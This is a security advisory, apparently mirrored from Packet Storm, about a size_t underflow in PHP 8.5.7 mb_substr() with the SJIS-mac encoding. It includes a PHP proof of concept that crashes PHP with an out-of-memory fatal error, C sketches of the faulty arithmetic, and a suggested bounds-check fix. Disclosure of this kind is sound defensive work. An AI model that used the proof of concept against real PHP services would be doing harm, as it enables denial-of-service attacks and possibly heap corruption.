
📄 PHP 8.5.7 mb_substr() Underflow

22 Jun 2026 · Reported by Khashayar Fereidani · Type: packetstorm · Source: packetstorm.news

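In PHP 8.5.7, mb_substr() with the SJIS-mac encoding bypasses an early-return guard, causing a size_t underflow that leads to an out-of-memory fatal error and, potentially, a heap buffer overflow.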

Code
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
    
    **Author:** Khashayar Fereidani
    **Disclosure Date:** 2026-06-18
    **Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
    **Contact:** https://fereidani.com/contact
    
    ## Description
    
    The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
    deliberately skips the early "return empty string" guard for the
    `SJIS-mac` encoding when `from >= in_len`. Execution therefore falls
    through to `mb_get_substr_slow()`, which calls
    `mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);`. When
    `from > in_len`, the expression `in_len - from` underflows `size_t`
    and yields an enormous allocation size (close to 2^64 bytes on
    64-bit builds). The immediate result is an Out-Of-Memory (OOM) fatal
    error. Furthermore, if `_ZSTR_STRUCT_SIZE(initsize)` wraps past
    `SIZE_MAX`, the allocation could be tiny while the buffer limit,
    which is derived from the unwrapped `initsize`, still points far
    beyond it. Decoded codepoints written afterwards would then overflow
    the heap buffer.
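    
    The underflow described above can be reproduced in isolation. The
    following is a minimal sketch, not the mbstring code: `SKETCH_MIN`
    and `sketch_initsize()` are hypothetical names, and it assumes an
    omitted length is represented as the maximum `size_t` value.
    
    ```c
    #include <stddef.h>
    #include <stdint.h>
    
    /* Hypothetical stand-in for the MIN() macro used in the advisory. */
    #define SKETCH_MIN(a, b) ((a) < (b) ? (a) : (b))
    
    /* Mirrors the unguarded expression MIN(len, in_len - from).
     * size_t is unsigned, so in_len - from wraps modulo 2^N
     * whenever from > in_len instead of becoming negative. */
    static size_t sketch_initsize(size_t len, size_t in_len, size_t from)
    {
        return SKETCH_MIN(len, in_len - from);
    }
    ```
    
    With `len = SIZE_MAX`, `in_len = 3` and `from = 1000000`, the helper
    returns `SIZE_MAX - 999996` rather than zero, so `MIN()` offers no
    protection once the subtraction has wrapped.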
    
    ## Proof of concept
    
    ```php
    <?php
    /*
     * PoC: mb_substr() 'SJIS-mac' size_t underflow
     * File:  ext/mbstring/mbstring.c
     *        mb_get_substr() (~L2129) + mb_get_substr_slow() (~L2102)
     *
     * mb_get_substr() deliberately skips the early "return empty" guard
     * for SJIS-mac:
     *
     *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
     *         return zend_empty_string;     // <-- sjis_mac bypasses this
     *                                       //     when from >= in_len
     *     }
     *
     * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
     * mb_get_substr_slow(), whose first line is:
     *
     *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
     *
     * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
     * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
     *
     * Two outcomes, both wrong (correct result is the empty string):
     *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
     *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
     *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
     *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
     *      while buf->limit = out + initsize stays wild -> a subsequent write of
     *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
     *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
     *      from < codepoint_count while from > byte_count. Worth upstream review.)
     */
    echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
         (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
    
    /* control: a normal encoding with from > strlen returns "" cleanly */
    echo "UTF-8, from=10 > strlen('abc'): -> ";
    var_dump(@mb_substr("abc", 10, null, "UTF-8"));
    
    /* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
     * The "tried to allocate 18...644 bytes" is (size_t)(3 - 1000000) plus the
     * 25 bytes that the reported figure implies _ZSTR_STRUCT_SIZE() adds. */
    echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
    @mb_substr("abc", 1000000, null, "SJIS-mac");
    echo "(if you see this line, the fatal error above was caught/suppressed)\n";
    ```
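    
    The two outcomes listed in the PoC comment differ only in whether the
    second addition also wraps. The sketch below models that arithmetic.
    It is an illustration under assumptions: `POC_ZSTR_OVERHEAD`,
    `poc_alloc_request()` and `poc_request_wraps()` are hypothetical
    names, and the 25-byte overhead is inferred from the allocation size
    reported in the PoC, not taken from the PHP headers.
    
    ```c
    #include <stdbool.h>
    #include <stddef.h>
    #include <stdint.h>
    
    /* Assumed overhead added by _ZSTR_STRUCT_SIZE() on a 64-bit build.
     * Hypothetical constant for this sketch only. */
    #define POC_ZSTR_OVERHEAD ((size_t)25)
    
    /* Size requested from the allocator when the length is omitted. */
    static size_t poc_alloc_request(size_t in_len, size_t from)
    {
        size_t initsize = in_len - from;      /* wraps when from > in_len */
        return initsize + POC_ZSTR_OVERHEAD;  /* may wrap a second time */
    }
    
    /* True when the overhead addition wraps past SIZE_MAX, which is
     * outcome (B): a tiny allocation paired with a huge initsize. */
    static bool poc_request_wraps(size_t in_len, size_t from)
    {
        size_t initsize = in_len - from;
        return initsize > SIZE_MAX - POC_ZSTR_OVERHEAD;
    }
    ```
    
    On a 64-bit build, `poc_alloc_request(3, 1000000)` evaluates to
    18446744073708551644, the figure in the fatal error of outcome (A).
    Under the same assumption, `poc_request_wraps()` is true only while
    `from` exceeds `in_len` by at most 25, which is the narrow window for
    outcome (B).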
    
    ## Impact
    
    An attacker who controls the offset passed to `mb_substr()` can
    supply `from > in_len` together with the 'SJIS-mac' encoding and
    trigger the `size_t` underflow. This reliably produces an
    Out-Of-Memory (OOM) fatal error, resulting in a Denial of Service.
    Depending on the environment, it might also lead to a heap buffer
    overflow, although that outcome is harder to trigger.
    
    ## Solution
    
    Tighten the checks in `mb_get_substr()` and `mb_get_substr_slow()`
    in `ext/mbstring/mbstring.c`. The calculation `in_len - from` should
    be bounds-checked so that it either stops early or is capped at zero
    when `from > in_len`, which avoids the underflow when the string
    buffer is initialized.
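    
    One way to express the capped subtraction is sketched below. This is
    not an upstream patch: `sketch_remaining()` and
    `sketch_safe_initsize()` are hypothetical helpers, and the sketch
    assumes the value passed to `mb_convert_buf_init()` is only an
    initial capacity, so that capping it at zero is harmless.
    
    ```c
    #include <stddef.h>
    
    /* Hypothetical helper: bytes remaining after `from`, capped at zero
     * instead of wrapping when from >= in_len. */
    static size_t sketch_remaining(size_t in_len, size_t from)
    {
        return from < in_len ? in_len - from : 0;
    }
    
    /* Guarded replacement for MIN(len, in_len - from). */
    static size_t sketch_safe_initsize(size_t len, size_t in_len, size_t from)
    {
        size_t remaining = sketch_remaining(in_len, from);
        return len < remaining ? len : remaining;
    }
    ```
    
    Comparing before subtracting keeps every intermediate value inside
    the range of `size_t`, so the result for `in_len = 3` and
    `from = 1000000` is zero regardless of `len`.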

Vulners AI Score: 5.8 (Medium risk)